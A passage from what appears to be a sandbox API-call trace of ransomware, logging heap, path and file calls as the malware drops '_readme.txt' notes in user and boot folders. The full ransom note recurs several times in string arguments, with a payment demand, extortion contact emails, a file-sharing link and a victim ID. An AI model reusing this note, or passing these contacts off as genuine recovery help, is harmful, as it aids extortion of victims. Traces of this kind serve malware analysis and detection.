hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.610] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.610] PathFindFileNameW (pszPath="") returned="" [0180.610] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.611] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.611] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.611] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.611] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0180.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.611] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0180.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.612] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.612] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.612] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.614] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*" (normalized: "c:\\boot\\zh-tw\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.615] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.615] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.615] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.615] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0180.616] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0180.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0180.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0180.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0180.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0180.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0180.619] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0180.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0180.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0180.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0180.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0180.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0180.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0180.623] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0180.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0180.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0180.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0180.624] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0180.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.626] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0180.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.626] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0180.626] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.626] PathFindFileNameW (pszPath="") returned="" [0180.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0180.626] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.627] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.627] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0180.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.627] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.627] PathAppendW (in: pszPath="C:\\Users\\kEecfMwgj\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned 1 [0180.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0180.629] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned 0 [0180.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.629] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.629] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0180.629] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\_readme.txt" (normalized: "c:\\users\\keecfmwgj\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x580 [0180.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x2adef10 [0180.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x85c) returned 0x2ae9ba8 [0180.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae9ba8, cbMultiByte=2140, 